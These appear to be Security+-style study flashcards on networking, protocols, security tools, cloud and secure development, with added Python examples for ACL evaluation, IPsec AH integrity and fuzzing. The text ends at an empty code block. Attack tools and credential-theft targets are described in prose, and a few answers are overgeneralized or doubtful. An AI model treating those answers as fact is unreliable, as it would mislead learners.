contains rules that define the type of data packet and the appropriate action to take when it enters or exits a network or system. Rules are evaluated in order, the first match wins, and the general actions are to either deny or permit; most implementations end with an implicit deny.
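An added example (not CertMaster content) of how an access control list is evaluated: rules carry an action, a protocol, source and destination networks and an optional destination port; the first matching rule decides, and a packet that matches nothing falls through to an implicit deny. The rule set and packets are constructed for the demonstration, and the ordering test at the end shows why rule order matters.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional, List, Tuple


@dataclass
class Rule:
    action: str            # "permit" or "deny"
    proto: str             # "tcp", "udp", "icmp" or "any"
    src: str               # source network in CIDR notation
    dst: str               # destination network in CIDR notation
    dport: Optional[int] = None   # destination port; None matches any port


@dataclass
class Packet:
    proto: str
    src: str
    dst: str
    dport: Optional[int] = None


def matches(rule: Rule, pkt: Packet) -> bool:
    """A rule matches when every field it specifies agrees with the packet."""
    if rule.proto != "any" and rule.proto != pkt.proto:
        return False
    if ipaddress.ip_address(pkt.src) not in ipaddress.ip_network(rule.src):
        return False
    if ipaddress.ip_address(pkt.dst) not in ipaddress.ip_network(rule.dst):
        return False
    return rule.dport is None or rule.dport == pkt.dport


def evaluate(acl: List[Rule], pkt: Packet) -> Tuple[str, Optional[int]]:
    """First-match evaluation. Returns (action, index of the matching rule),
    or ("deny", None) for the implicit deny at the end of the list."""
    for index, rule in enumerate(acl):
        if matches(rule, pkt):
            return rule.action, index
    return "deny", None


# Constructed rule set (assumption for the example, not a real device config).
ACL = [
    Rule("deny",   "tcp", "10.0.99.0/24", "0.0.0.0/0",       22),   # quarantine subnet: no SSH anywhere
    Rule("permit", "tcp", "10.0.0.0/8",   "192.168.1.10/32", 22),   # internal users to the jump host
    Rule("permit", "udp", "0.0.0.0/0",    "192.168.1.53/32", 53),   # public DNS resolver
    Rule("permit", "tcp", "0.0.0.0/0",    "192.168.1.80/32", 443),  # public web server, HTTPS only
]

if __name__ == "__main__":
    tests = [
        Packet("tcp", "10.0.0.5",    "192.168.1.10", 22),
        Packet("tcp", "10.0.99.5",   "192.168.1.10", 22),
        Packet("tcp", "203.0.113.7", "192.168.1.10", 22),
        Packet("tcp", "10.0.0.5",    "192.168.1.80", 80),
    ]
    for pkt in tests:
        print(pkt, "->", evaluate(ACL, pkt))
    # Swap the first two rules and the quarantined host reaches the jump host.
    print("reordered:", evaluate([ACL[1], ACL[0]] + ACL[2:], tests[1]))
```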
Data Loss Prevention (DLP)
scans for content in a structured format like an e-mail and performs an action based on policy (e.g., blocks an e-mail containing proprietary information).
Secure Sockets Layer
is a network protocol that establishes an encrypted link between a web server and a browser. All SSL versions are now deprecated; its successor, TLS (Transport Layer Security), provides the same function. Users commonly interact with their bank's web portal over an SSL/TLS connection.
STP (Spanning Tree Protocol)
is a means for the bridges to organize themselves into a hierarchy and prevent loops from forming.
Port security
is an advanced security feature that allows a certain amount of MAC addresses to access a physical port. After a certain number, new connections will be blocked.
flood guard
is a feature of a circuit-level firewall that prevents maliciously open connections from forming. This is not applicable to switching loops.
BitLocker will not be transparent to the user if a TPM chip is used.
False
Other names for an Application Firewall
1. Application layer gateway firewall 2. stateful multilayer inspection firewall 3. deep packet inspection firewall
agentless health or posture assessment
supports a wide range of devices, such as smartphones and tablets, but less detailed information about the client is available.
non-persistent or dissolvable agent
is loaded into memory and never installed on the system. This option still requires an agent that may not be compatible with mobile devices.
bridge
connects two network segments together. An example includes a bridged connection between the wireless and Ethernet adapters of a laptop.
ad hoc network
is created when wireless network adapters are configured to connect to one another in a peer-to-peer WLAN (Wireless LAN) topology.
Firewalls can operate at many levels.
True
SSL decryptor, inspector, or interceptor
is a type of proxy used to examine encrypted traffic before it enters or leaves the network. This ensures that traffic complies with data policies and strong cipher suites are used. It is positioned at the network's edge as a transparent bridge to evade a hacker's view. It will not be a regular device with an IP address on its own subnet range.
What does a SSL decryptor commonly integrate with?
A DLP or SIEM to apply security policies and provide effective monitoring and reporting.
SSL interceptors are found in a UTM.
False
CARP
Common Address Redundancy Protocol
Gateway Load Balancing Protocol (GLBP)
is Cisco's proprietary protocol for providing a load-balanced service with a virtual IP (VIP). GLBP and CARP are similar in functionality.
Why is placing the SSL decryptor at the edge of a network a drawback (or con).
The edge of the network is also the point where the internal network meets the public network. This placement makes the SSL decryptor a single point of failure.
What does the technique of using foil on Wi-Fi routers accomplish?
is mainly used to increase the wireless range or its performance.
email certificate
can be used to sign and encrypt email messages, typically using S/MIME (Secure/Multipurpose Internet Mail Extensions) or PGP (Pretty Good Privacy).
-t switch pings
pings the specified server name or IP (Internet Protocol) address until stopped. Pressing Ctrl+C stops the pings.
-n switch
sets the number of echo requests to send. The standard send count is four. The number can be specified after the -n switch.
-S switch
which is a capital S, is used to specify a source address to use that is different from the server that the admin is initiating the ping command from.
-r switch
records route for count hops. This is used for IPv4 addresses.
Proprietary company information is never stored in the same location as Windows operating system files and folders or the C: drive.
True
%SystemRoot%\NTDS\NTDS.DIT file
is the Active Directory database on a domain controller. It stores domain user accounts and their password hashes (not plaintext passwords), which makes it a prime target for credential theft.
Aircrack-ng
is a suite of utilities designed for wireless network security testing. The specific tool, which is also called aircrack-ng, can decode the authentication pre-shared key or password for WEP, WPA, and WPA2 using a dictionary word or a relatively short key.
inSSIDer
is a software that can survey Wi-Fi networks to determine SSID, BSSID (wireless access point MAC address), frequency band, and radio channel.
Netcat (nc)
is a command-line networking utility, available for both Windows and Linux, that reads and writes raw data over TCP or UDP connections. It is not malware in itself, but attackers commonly use it to set up a backdoor or reverse shell, so its unexpected presence on a host is treated as suspicious.
Wireshark
is a protocol analyzer. It can parse the headers of network protocols, list their contents and derive their purpose. This can help pinpoint dropped packets and the network adapter involved, so further troubleshooting can take place.
Sysinternals
is a suite of tools designed to assist with troubleshooting issues with Windows. Its Process Explorer can reveal all the processes and its details on the system. These tools are not useful for a networking issue.
Meterpreter
is a Metasploit payload (not an exploit module) delivered by stagers that use in-memory DLL injection. It runs entirely in memory on the compromised host and gives the attacker an interactive shell with post-exploitation modules.
Stagers
create a network connection between the hacker and the target. Since the stagers are in memory and never written to disk, any trace can be removed with a restart of the server.
Nexpose
is a vulnerability scanner. When integrated with Metasploit Pro, Metasploit can then read the scan report and confirm vulnerabilities to rule out false positives.
Kali or Kali Linux
is a Debian-derived Linux distribution designed for system forensics and penetration testing.
Nessus
is a vulnerability scanner from Tenable. A hacker may use a vulnerability scanner to seek out easy targets (e.g., open ports) to plan for an attack.
Active KillDisk
is a disk wiping sanitization software tool that can purge data on disk by overwriting data with 1s and 0s. Overwriting might also be performed in multiple passes. The disk can be recycled after using this software.
Microsoft Security Compliance Toolkit
includes the Policy Analyzer Tool and the Local Group Policy Object (LGPO) Tool. Both are necessary to assess the local policies from a baseline and automate changes where needed.
Kerberos
is the preferred method in a Windows domain using a ticket granting system to login and access resources on the network.
Unlike LM and NTLM, Kerberos supports the use of tokens or biometric authentication.
True
NTLM
New Technology LAN Manager. An authentication protocol intended to improve on LAN Manager (LM). The LM protocol stores a password hash computed by converting the password to uppercase, padding or truncating it to 14 characters and splitting it into two seven-character halves that are hashed independently, which makes LM hashes easy to crack. For backward compatibility, Windows may still store the LM hash alongside the NTLM hash unless the password is longer than 14 characters (or LM storage is disabled by policy). NTLMv1 is older and has known vulnerabilities. NTLMv2 is newer and considerably stronger, though Kerberos is preferred in a domain.
BitLocker
A Windows feature that encrypts an entire drive
Cain and Abel
is used to recover Windows passwords and includes a password sniffing utility.
John the Ripper Tool
Is a free password cracking software tool. It is compatible with multiple platforms. It's one of the most popular password testing and breaking programs as it combines a number of password crackers into one package, auto detects password hash types, and includes a customizable cracker.
THC Hydra
A password cracking tool that uses a dictionary (or brute-force) attack against live network logins. It is often used against remote authentication protocols such as Telnet, FTP (File Transfer Protocol), HTTPS (Hypertext Transfer Protocol Secure), SMB (Server Message Block), etc.
Zenmap
is the GUI (Graphical User Interface) version for Nmap. Also known as Nmap Security Scanner, it uses diverse methods of host discovery
OUI (Organizationally Unique Identifier) grabbing
is like banner grabbing or OS fingerprinting. The OUI can identify the manufacturer of the network adapter and therefore, conclude other assumptions related to system type and/or purpose.
OS (operating system) fingerprinting
is a method used by Nmap to probe hosts for running OS type and version, and even application names and device type (e.g., laptop or virtual machine).
Side channel attacks
are attacks that recover secrets from the physical implementation of a cryptographic system (timing of operations, power consumption, electromagnetic emissions, cache behaviour, even acoustic noise) rather than from weaknesses in the algorithm itself.
In a general order of restoration, the first step is?
The first step is to enable and test power delivery systems such as the power grid, generators, and UPSs (uninterruptible power supplies). Without power, IT systems and network equipment cannot run.
In a general order of restoration, the third step is?
The third step is to enable and test network security appliances, such as firewalls, so that cloud services can reach the network to restore data.
In a general order of restoration, the seventh or final step is?
to enable client workstations, devices, and even client browser access.
Order of Restoration
The sequence in which different systems are reinstated.
Credentialed Scan
is given a user account with logon rights to various hosts. This method allows much more in-depth analysis, especially in detecting when applications or security settings may be misconfigured.
Banner grabbing
refers to probing a server like OS fingerprinting; however, it also involves opening random connections to common port or network protocols and gathering information from banner or error responses.
Microsoft's Policy Analyzer
is part of the Security Compliance Toolkit (SCT). It compares scanned hosts with a template of controls and configuration settings to determine system compliance.
Microsoft System Center Configuration Manager (SCCM)
is a software management suite to manage a large amount of systems on multiple platforms. It does not include a policy analyzer tool and a LGPO tool.
The Department of Defense (DoD) 5220.22-M wipe method
involves a three-phase pass of writing 1s, 0s, and random characters onto a hard drive. This method will prevent the use of many software-based file recovery methods
Degaussing
is a method of erasing data on a hard drive with a powerful magnet. This process also renders the drive unusable because of permanent damage to the device's servo control data that is required to read and write.
Chain of trust
The chain of certificates linking an end-entity certificate, through one or more intermediate (subordinate) certificate authorities, to a trusted root CA. A certificate is trusted only if every link in the chain validates.
MTTF
Mean time to failure. The length of time you can expect a device to remain in operation before it fails. It is similar to MTBF, but the primary difference is that the MTBF metric indicates you can repair the device after it fails. The MTTF metric indicates that you will not be able to repair a device after it fails.
Mean Time to Repair (MTTR)
is a measure of the time taken to correct a fault so that the system is restored to full operation. Neither MTTF nor MTBF measures repair time.
The BIOS (Basic Input/Output System) can be used to disable the USB ports on the motherboard.
True
SATA
Serial Advanced Technology Attachment; interface that uses serial signals to transfer data, instructions, and information.
eSATA (External SATA)
Serial ATA-based connector for external hard drives and optical drives.
VIB (vSphere Installation Bundle)
is a zip file that provides additional features or integration capabilities with other devices, like NetApp storage.
SEP
Symantec Endpoint Protection is the commonly known anti-virus software that should be on every client image.
Process Explorer
It is part of the Windows Sysinternals suite. In addition to listing running processes, Process Explorer shows the files and directories each process has open, its open handles, and its loaded DLLs.
SFC (System File Checker)
is a Windows tool that verifies the integrity of protected operating system (OS) files and can replace corrupted ones (run as sfc /scannow from an elevated command prompt).
Autoruns tool
which is part of Windows Sysinternals, can help with hunting down malware on a computer.
The WSUS (Windows Server Update Service) server
is a central repository for updates to the OS and Microsoft applications such as Office. Once updates have been downloaded to it, WSUS distributes them to the client computers. (The product name is Windows Server Update Services.)
Storage segmentation
is personal data that is segmented from organizational data on a mobile device. It gives IT administrators control over corporate assets on employees' mobile devices.
baseband update
modifies the firmware of the radio modem used for cellular, Wi-Fi, Bluetooth, NFC, and GPS connectivity.
Jailbreaking
gives users the ability to obtain root privileges, sideload apps, change or add carriers and customize the interface. It is accomplished by booting the device with a patched kernel and can be done when the device is attached to a computer when it boots.
Indoor Positioning Systems (IPS)
finds a device's location by triangulating its proximity to other radio sources, such as Wi-Fi access points or Bluetooth beacons.
GPS tagging
is the process of adding geographical identification metadata, such as the latitude and longitude of where the device was located at the time, to media, such as photographs, SMS messages, video, and so on.
Device discovery
occurs when a device is put into discoverable mode, meaning it advertises itself and answers inquiries from any other Bluetooth device nearby. Being discoverable makes the device easier to target, so it should be left off except while pairing.
PANs
Personal Area Networks
Adaptive Network Topology (ANT)
is widely used in communicating health and fitness sensor data between devices. ANT+ is its associated product standard.
Both jailbreaking and rooting are methods that will give the user unrestricted access to a mobile device's entire file system.
True
Implicit Transport Layer Security (FTPS)
negotiates a Secure Sockets Layer/Transport Layer Security (SSL/TLS) tunnel before any File Transfer Protocol (FTP) commands are exchanged; it uses a dedicated port (990) rather than FTP's port 21.
Explicit TLS (FTPES)
connects on the normal FTP port (21) and uses the AUTH TLS command to upgrade the unsecured connection to TLS.
Secure Shell (SSH) FTP (SFTP)
encrypts authentication and data transfer between client and server inside an SSH connection (TCP port 22). SFTP is not FTP tunneled over SSH but a separate file-transfer subsystem of SSH.
Trivial File Transfer Protocol (TFTP)
is a connectionless protocol (it runs over UDP) that provides basic file transfer services. It offers neither the guaranteed delivery of FTP (which runs over TCP) nor any authentication.
Dynamic Host Configuration Protocol (DHCP)
provides an automatic method for network address allocation. In addition to an IP address and subnet mask, a lease can carry optional parameters such as the default gateway and DNS servers.
Authentication Header (AH) protocol
computes an HMAC (Hashed Message Authentication Code) over the packet using a shared secret key known only to the communicating hosts, and carries it in the AH header as the Integrity Check Value (ICV). Fields that legitimately change in transit, such as the TTL, are zeroed for the calculation. AH provides integrity and origin authentication but no confidentiality, and because the source and destination addresses are covered by the ICV it does not survive NAT.
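The ICV mechanism described above, as an added example that is not part of the original card set. It is a simplified model of AH: the receiver recomputes the HMAC over the covered fields (with the mutable TTL zeroed), compares it in constant time, and applies the AH anti-replay rule on the sequence number. The key, addresses and payload are constructed for the demonstration; the 128-bit truncation follows HMAC-SHA-256-128 (RFC 4868).

```python
import hashlib
import hmac
import ipaddress
import struct


def ah_icv(key: bytes, src: str, dst: str, seq: int, payload: bytes) -> bytes:
    """ICV over the fields AH protects. The TTL is a mutable field, so it is
    treated as zero here no matter what value the packet carries on the wire.
    Truncated to 128 bits as HMAC-SHA-256-128 (RFC 4868) specifies."""
    covered = (ipaddress.ip_address(src).packed
               + ipaddress.ip_address(dst).packed
               + struct.pack(">BI", 0, seq)      # TTL zeroed, sequence number
               + payload)
    return hmac.new(key, covered, hashlib.sha256).digest()[:16]


def seal(key: bytes, src: str, dst: str, seq: int, payload: bytes, ttl: int = 64) -> dict:
    """Sender side: a constructed packet (dict) carrying its ICV."""
    return {"src": src, "dst": dst, "ttl": ttl, "seq": seq, "payload": payload,
            "icv": ah_icv(key, src, dst, seq, payload)}


class AhReceiver:
    """Receiver side: verifies the ICV with a constant-time compare and enforces
    anti-replay. A sequence number already seen, or older than the window, is
    rejected even when its ICV is valid."""

    def __init__(self, key: bytes, window: int = 64):
        self.key, self.window = key, window
        self.highest, self.seen = 0, set()

    def accept(self, pkt: dict) -> bool:
        expected = ah_icv(self.key, pkt["src"], pkt["dst"], pkt["seq"], pkt["payload"])
        if not hmac.compare_digest(expected, pkt["icv"]):
            return False            # tampered payload, wrong key, or NAT-rewritten address
        if pkt["seq"] in self.seen or pkt["seq"] <= self.highest - self.window:
            return False            # replay
        self.seen.add(pkt["seq"])
        self.highest = max(self.highest, pkt["seq"])
        return True


def demo() -> dict:
    """Walk through the cases a practitioner cares about. Returns the verdicts."""
    key = b"constructed-shared-secret-for-demo"
    rx = AhReceiver(key)
    good = seal(key, "10.0.0.1", "10.0.0.2", 1, b"hello")
    good["ttl"] -= 1                         # a router hop changed the mutable TTL
    tampered = seal(key, "10.0.0.1", "10.0.0.2", 2, b"hello")
    tampered["payload"] = b"hellp"           # one byte of payload flipped in transit
    natted = seal(key, "10.0.0.1", "10.0.0.2", 3, b"hello")
    natted["src"] = "203.0.113.5"            # NAT rewrote the source address
    return {
        "ttl_changed": rx.accept(good),      # True: TTL is not covered
        "replayed": rx.accept(good),         # False: same sequence number again
        "tampered": rx.accept(tampered),     # False: ICV mismatch
        "natted": rx.accept(natted),         # False: address is covered by the ICV
    }
```

The `natted` case is the practical reason AH is rarely used across the Internet: any NAT device on the path invalidates every packet, which is why ESP (which does not cover the outer IP header) is the usual choice.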
Terminal Access Controller Access-Control System Plus (TACACS+)
is more reliable than RADIUS. It uses TCP on port 49, and this connection-oriented delivery makes it easier to detect when a server is down. The entire body of each TACACS+ packet is encrypted, whereas RADIUS encrypts only the password.
Directory services
is a network service that stores identity information in a particular network, including users, groups, servers, client computers, and printers.
stratum 2 server
obtains its time from a stratum 1 server. A server takes time only from a server with a lower stratum number (a higher level in the hierarchy); stratum 0 is the reference clock itself.
Simple Network Management Protocol (SNMP) v3
supports encryption and strong user-based authentication. Instead of community names, the agent is configured with a list of usernames and access permissions.
SNMPv1
uses community names that are sent in plaintext and should not be transmitted over the network, if there is any risk they could be intercepted. This protocol does not support encryption.
SNMPv2c
also uses community names that are sent in plaintext and should not be transmitted over the network, if there is any risk they could be intercepted. Like SNMPv1, this protocol does not support encryption
Management Information Base (MIB)
is the database that the agent within SNMP utilizes. The agent is a process that runs on a switch, router, server or other SNMP compatible network device.
What are most authentication and access control protocols dependent on?
Time synchronization
International frameworks
are governed by international standards and are meant to be implemented globally rather than nationally.
National Institute of Standards and Technology framework
addresses cybersecurity risks and activities in the United States; NIST is part of the U.S. Department of Commerce and its Cybersecurity Framework is considered a national framework. It is voluntary guidance rather than a regulation.
Regulatory frameworks
are based on specific laws and regulations and ensure compliance of those standards. Medical records are governed by regulatory laws.
Industry-specific frameworks
are governed according to the type of product provided. Financial information (i.e. credit card, bank account) is covered under industry-specific standards.
Control diversity
includes the use of multiple control types such as administrative, technical and physical. This can include security guards (physical), an IDS or Intrusion Detection System (technical), and penetration testing (administrative).
Hardware Security Module (HSM)
is a device used to generate, maintain and store cryptographic keys.
Vendor diversity
is the use of multiple vendors for security controls. If one vendor's product has a flaw or is compromised, the other vendor's product may still catch the attack, adding another layer to the network's defense in depth.
Defense-in-depth
uses a combination of control types for control diversity.
Secure Socket Layer (SSL) accelerator
is designed to offload the computationally expensive TLS handshake and encryption from servers so network load can be distributed. It can front a pool of servers, balancing session requests while providing a seamless service to consumers of network applications.
SSL decryptor
provides protection from malicious threats over secure connections and would be placed in the Demilitarized Zone (DMZ).
aggregation switch
concentrates the uplinks from many access-layer switches (or links from multiple subnets) into fewer, higher-speed ports, reducing the number of active ports the upper layers must manage.
wireless topology
is used to extend a wired local area network through the use of an antenna.
ad hoc zone
is created when two or more wireless devices connect to one another creating an on-demand network. This network architecture does not require an AP.
Firewalls
allow the network administrator to divide the network into different network segments known as zones
collector
combines multiple sensors to collect network traffic for processing by an Intrusion Detection System (IDS) and other systems. Its placement determines the type of traffic analyzed.
correlation engine
is part of a Security Information and Event Manager (SIEM). It captures and examines logged events to alert administrators of potential threats on a network.
Redundant Array of Inexpensive Disks (RAID)
provides increased system availability and fault tolerance for disks, except RAID 0 (striping), which improves performance but has no redundancy.
Clustering
provides for high availability for servers and can remove the single point of failure. Clustering is similar to load balancing, but is more costly than RAID implementations.
extranet
is a zone created to allow authorized users access to company assets separate from the intranet.
intranet
is an internal company zone established to allow employees the ability to share content and communicate more effectively.
Cloud Access Security Broker (CASB)
is a part of security as a service, and monitors network traffic between a company's network and cloud provider, enforcing security policies.
split tunnel VPN
administrators decide which traffic goes through the tunnel. Only traffic destined for the private network is routed through the VPN; everything else goes directly to the Internet, which improves performance but bypasses the corporate inspection controls.
Isolating traffic
is the act of separating system services to protect applications from other parts of the system.
Creating an airgap
would physically isolate a system and its resources from other systems.
Automated triggers
are predefined security rules created in a SIEM that alert an administrator of malicious or suspicious events once triggered.
Aggregation in a SIEM
refers to the collection of data logs from multiple security devices.
Dynamic Network address translation (NAT)
maps private IP addresses to public addresses drawn from a pool, hiding the internal addresses from the Internet. An address is taken from the pool when an inside host needs one and returned when the translation expires; if the pool is exhausted, new connections fail until an address frees up.
Electromagnetic Interference (EMI)
is radio-frequency noise emitted by external sources, such as power lines and lighting, that disturbs data signals.
Shielding
can protect from data loss and interference. Electromagnetic Interference (EMI) can also be avoided through this method.
Self-Encrypting Drive (SED)
includes both the hardware and firmware to encrypt all data written to the drive. The keys are stored within the drive's controller and are never exposed to the host operating system.
mail gateway
examines incoming and outgoing email traffic. It can be configured to inspect messages for certain terms and to force encryption based on policy. It can also block email traffic it deems suspicious or non-compliant.
Least functionality
employs the principle of deploying systems with only the services and protocols required to perform the job.
master image
is a baseline for the system. This image includes the final product of software and security services running on a system.
Secure configuration of systems
refers to security measures that are implemented as a way to provide protection for computer systems.
Hardening an Operating System (OS)
is the practice of removing or changing insecure defaults, disabling unneeded services and accounts, and applying patches so that the system presents a smaller attack surface.
Multi-Level Security (MLS)
is an implementation of MAC that focuses on confidentiality. It is able to enforce the separation of multiple classifications of information.
hardware root of trust
is a known secure starting point: a cryptoprocessor such as a TPM holds a private key in tamper-resistant hardware, and that key never leaves the device. Anything it signs can be checked against the corresponding public key, which lets the rest of the boot chain be measured and trusted.
Secure boot
is a UEFI feature that checks the digital signature of each boot component (boot loader, kernel, drivers) against keys stored in firmware and refuses to run anything unsigned or modified.
Attestation
is the process of proving the state of a system to another party: measurements of each boot component are recorded (for example in TPM PCRs) and a signed report of them is presented to a verifier, which can then decide whether the boot was trustworthy.
Unified Extensible Firmware Interface (UEFI)
is a specification for a software program that connects a computer's firmware to its operating system. It is the replacement for BIOS (Basic Input/Output System) and has many advancements to include provisions for secure booting.
The Basic Input/Output System (BIOS) supports secure boot.
False
sandbox
is an isolated environment that is often used for testing. Security, patches, and critical updates can be tested there also without touching the system before implementation.
staging environment
mimics that of production and allows for an environment to practice deployment. In the event deployment fails in this environment, it can roll back to the test and development environments.
production environment
is the final stage of the deployment effort. Testing in this environment would be too late, given it is the operational environment.
development environment
is a place for creation. Requirements are turned into reality in this environment. It is not a complete copy of production, but just the beginning of an application.
Error handling techniques
catch errors in action to avoid system failure. It is a secure coding method during the development process.
Code refactoring
is the process of improving the structure of existing code without changing its external behavior or adding new requirements.
System on a Chip (SoC)
is a microchip that contains all the parts a computer needs to operate by itself. Devices built around a SoC include smartphones, tablets, and smartwatches. Data loss has become a primary security concern for these systems.
Supervisory Control and Data Acquisition (SCADA) system
is an Industrial Control System (ICS) that is used to control infrastructure processes, facility-based processes, or industrial processes.
Infrastructure as Code (IaC)
is the practice of managing and provisioning infrastructure through machine-readable definition files (templates, scripts) rather than manual configuration, so environments can be versioned, reviewed, and rebuilt automatically.
Code signing
verifies application code has not been modified by the use of digital signatures. The certificate provided with the signature identifies the author of the application and the code's authenticity. It is a secure coding practice.
Input Validation
verifies data is valid. It uses a set of rules to validate entries in fields for proper use. In the event an entry is invalid, the application will reject the entry.
Memory management
is the process of controlling and coordinating computer memory to maximize system performance. Poor memory management techniques can result in overflow issues.
stored procedure
is a set of Structured Query Language (SQL) statements stored in a database as a group, so it can be reused and shared by multiple programs. They can validate input.
Model verification
is the process of ensuring software meets its intended purpose and specifications.
state table
contains information about sessions between network hosts. This type of data is gathered by a stateful firewall.
static code analyzer
examines code quality and effectiveness without executing the code. It can be used in conjunction with development, for continued code quality checks or once the code is in its finalization stages.
Stress testing
attempts to simulate a production environment and focuses on the objective and threshold loads an application can handle while maintaining performance.
Regression testing
re-runs the existing test suite after a change to determine whether previously working functionality has been adversely affected.
Normalization
is used to optimize database performance by removing duplicates, use of primary keys, and related data contained in separate tables.
Client side input validation
checks data in the browser or client before it is sent, giving the user immediate feedback. Because an attacker controls the client, it can be bypassed and must never be the only check.
Server side validation
occurs on the web server or back end, so it costs a round trip but cannot be bypassed by the client. It is the authoritative check and is more secure than client side validation.
Dynamic analysis
inspects code as it is running for code quality and vulnerabilities. Fuzzing is a common technique used.
Fuzzing
is a dynamic analysis technique: the running program is fed large volumes of random or malformed input while being monitored for crashes, hangs, and other unexpected behaviour that indicate vulnerabilities.
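A minimal fuzzing harness, added here as an example and not part of the original card set. It fuzzes a deliberately fragile length-prefixed record parser with both purely random bytes and mutations of a valid record, treats the parser's own ValueError as an expected rejection and anything else as a crash, and then runs the same harness against a bounds-checked version. The record format, the parsers and the sample record are constructed for this example.

```python
import random


def make_record(payload: bytes) -> bytes:
    """Build a well-formed record: [length][payload][8-bit checksum]."""
    return bytes([len(payload)]) + payload + bytes([sum(payload) & 0xFF])


def parse_record_naive(buf: bytes) -> bytes:
    """Deliberately fragile parser: trusts the length byte, so it indexes past
    the end of short or truncated input and raises IndexError."""
    n = buf[0]
    payload = buf[1:1 + n]
    if buf[1 + n] != sum(payload) & 0xFF:
        raise ValueError("bad checksum")
    return payload


def parse_record_hardened(buf: bytes) -> bytes:
    """Same format, but every read is bounds-checked first; malformed input is
    rejected with ValueError instead of crashing."""
    if len(buf) < 2:
        raise ValueError("record too short")
    n = buf[0]
    if len(buf) != n + 2:
        raise ValueError("length field does not match buffer")
    payload = buf[1:1 + n]
    if buf[1 + n] != sum(payload) & 0xFF:
        raise ValueError("bad checksum")
    return payload


def mutate(rng: random.Random, seed: bytes) -> bytes:
    """Mutation-based fuzzing: flip a bit, insert a byte, or drop a byte."""
    data = bytearray(seed)
    op = rng.randrange(3)
    if op == 0 and data:
        i = rng.randrange(len(data))
        data[i] ^= 1 << rng.randrange(8)
    elif op == 1:
        data.insert(rng.randrange(len(data) + 1), rng.randrange(256))
    elif data:
        del data[rng.randrange(len(data))]
    return bytes(data)


def fuzz(parser, iterations: int = 2000, seed: int = 7):
    """Feed random and mutated inputs to `parser`. ValueError is the parser's
    expected rejection; any other exception is recorded as a crash."""
    rng = random.Random(seed)                 # fixed seed: runs are reproducible
    valid = make_record(b"constructed sample")
    crashes = []
    for i in range(iterations):
        if i % 2:
            data = mutate(rng, valid)
        else:
            data = bytes(rng.randrange(256) for _ in range(rng.randint(0, 8)))
        try:
            parser(data)
        except ValueError:
            continue
        except Exception as exc:
            crashes.append((data, type(exc).__name__))
    return crashes
```

The distinction between "rejected" and "crashed" is the heart of a fuzz harness: a parser is allowed to refuse input, but an uncaught exception (or, in native code, a memory fault) on attacker-controlled data is exactly the finding dynamic analysis is looking for.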
Continuous integration
allows for the merging of code changes into a central repository. The code is built and tested each time it is checked into the environment, providing a more efficient method to code production.
Provisioning
is the process of procuring, configuring and making available an application or system on certain services. Performing this on an application allows it to run on its intended platform.
Deprovisioning
is the act of removing or disabling access to a resource. Since the application has been replaced, the application should be deprovisioned to preserve resources.
waterfall method
maintains a top to bottom approach. When one stakeholder has finished a piece of work, the other can then begin. This approach ensures each phase of development is completed before another can proceed.
agile methodology
software development focuses on cross-functional teams working together throughout the life cycle of a project. This development encourages continued interaction between each stakeholder to produce continued deliverables at a quick pace.
DevOps
combines development and operations so that building, testing, and deploying code is automated and continuous, with constant interaction between stakeholders. When security is made a continuous focus throughout that pipeline, the model is called Secure DevOps (DevSecOps).
Compiling code
occurs when source files must be translated by a compiler to produce an executable. The compiler checks the code for errors and, if it finds one, does not produce an executable.
Requirements gathering
is the process of collecting technical, functional and system necessities for a system.
kanban methodology
is an agile approach that focuses on the growth of products with continual delivery while not overburdening the development team.
Secure DevOps development model
combines the words development and operations. It is an agile-aligned model that includes security throughout its process.
immutable system
is one that is never modified after deployment. Changes are made by building a new secure image, testing it in a controlled DevOps environment, and replacing the running instance rather than patching it in place.
private cloud
is defined as computing services offered either over the Internet or within a private internal network. Only certain authorized users can access a private cloud infrastructure.
Public Cloud
exists on the premises of the cloud provider. A service provider makes resources available to the general public over the internet
Hybrid Cloud
is an environment that uses a mix of public, community and private cloud concepts with a single management platform.
community cloud
is a collaborative effort in which infrastructure is shared between several organizations that share a common interest.
Security as a Service (SECaaS)
is a part of the Software as a Service (SaaS) platform. It handles and manages security practices for a customer. Any security services provided in the cloud are a subset of SaaS cloud-based technologies.
PaaS provides security services.
False
Type I Hypervisors
are virtualization solutions that run directly on system hardware. They do not require operating system involvement in order to run.
Type II Hypervisors
are virtualization solutions that run as software and do require a host operating system.
Virtual machine (VM) escape
refers to an unauthorized user taking control of a host machine through a VM. The attacker can take administrative control of the host and subsequently, the virtual machines connected.
Virtualization sprawl
is a phenomenon that occurs when the number of VM's on a network reaches a point where the administrator can no longer manage them effectively.
Distributive allocation
provides that multiple nodes are configured to work together on complex problems. A central processor divides the task into smaller pieces and coordinates tasking the nodes. If a single node fails, processing continues for a high availability solution.
Failover clusters
use multiple servers to maintain high availability for a service. One node remains active while the other stands by; if the active node fails, the standby node takes over the load.
Scalability
is the capacity to handle an increased workload by adding resources, either to existing nodes (scaling up) or by adding nodes (scaling out).
Fault tolerance
is a product of redundancy and allows that, in the event of a crash, the system will maintain operations by removing the single point of failure. The system will continue to operate without notice.
automated scripting
can help keep systems in a secure state. It can continuously check configurations of a system and react accordingly to keep systems secure and available.
Access assessment
would be a process of evaluating what access users need to perform their jobs; this would not include implementation of policy.
account revocation
is more relevant to the closure of accounts and revocation of credentials than in the creation of a new account.
one-way trust
describes a relationship in which one domain trusts another but not vice versa. In the page's example, the child (IronCorp) trusts the parent (SteelCorp), but the parent does not trust the child. Note that the parent-child trusts Active Directory creates automatically are two-way and transitive; a one-way trust has to be created deliberately.
Signature recognition technologies
match how the user applies their signature, analyzing aspects such as stroke, speed, and pressure, making it more difficult to spoof than a simple forgery.
Security Assertion Markup Language (SAML)
is not an identity provider; it is an open standard that lets identity providers (IdPs) pass signed assertions about a user's authentication and attributes to service providers (SPs). Shibboleth is an implementation that acts as both an IdP and an SP.
X.500 naming convention
lists the most specific attribute first, with each subsequent attribute broader than the last.
distinguished name in an X.500 directory,
identifies a resource by attribute=value pairs, separated by commas. The attributes are listed in order from most specific to broadest term.
In what way does Challenge Handshake Authentication Protocol (CHAP) protect against replay attacks?
The handshake is repeated with different challenge messages periodically throughout the session connection
Which of these correctly orders attributes of following the X.500 distinguished naming convention standard?
Common Name (CN), Organizational Unit (OU), Organization (O), Country (C), Domain Component (DC)
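An added example (not part of the original card set) for the X.500 distinguished name cards: a small parser that splits a DN into attribute=value pairs while honouring backslash-escaped commas, a checker for the most-specific-first ordering the cards describe, and a serializer that re-escapes values. The specificity order is the one given on this page (CN, OU, O, C, DC); hex escapes of the \2C form and multi-valued RDNs (joined with +) are left out of this example, and the sample DNs are constructed.

```python
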